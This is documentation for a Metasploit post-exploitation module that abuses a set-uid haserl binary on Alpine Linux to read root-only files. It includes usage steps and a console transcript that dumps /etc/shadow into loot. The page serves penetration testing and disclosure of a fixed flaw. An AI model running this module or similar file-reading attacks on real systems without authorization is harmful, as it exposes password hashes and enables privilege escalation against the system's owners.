Christophe De La Fuente
1.8 KiB
1.8 KiB
Vulnerable Application
Haserl is an unmaintained tool to use LUA as CGI in web servers. On Linux, when haserl is suid root, it will attempt to drop its privilege to the uid/gid of the owner of the cgi script, similar to suexec in Apache.
Haserl could have been a thing of the past, but it's used in Alpine Linux' Alpine Configuration Framework, which is commonly used on this distribution.
This module exploits the fact that calling haserl on a file will make it not only change the effective UID, but also display the content of the file.
This has been fixed in version 0.9.36.
Prerequisites
- Install Alpine Linux
- Install haserl
Verification Steps
- Start msfconsole
- Get a shell
- Do:
use post/linux/gather/haserl_read - Set
SESSION - Do:
runorexploit - Verify that the file was successfully downloaded
Options
RFILE
Remote file to download, defaults to /etc/shadow.
Scenarios
msf6 > use post/linux/gather/haserl_read
msf6 post(linux/gather/haserl_read) > show options
Module options (post/linux/gather/haserl_read):
Name Current Setting Required Description
---- --------------- -------- -----------
RFILE /etc/shadow yes File to read
SESSION 1 yes The session to run this module on.
msf6 post(linux/gather/haserl_read) > run
[!] SESSION may not be compatible with this module.
[+] Found set-uid haserl: /usr/bin/haserl-lua53
[+] Shadow saved in: /home/user/.msf4/loot/20210301204020_default_192.168.138.113_haserl_shadow_107368.txt
[*] Post module execution completed
msf6 post(linux/gather/haserl_read) >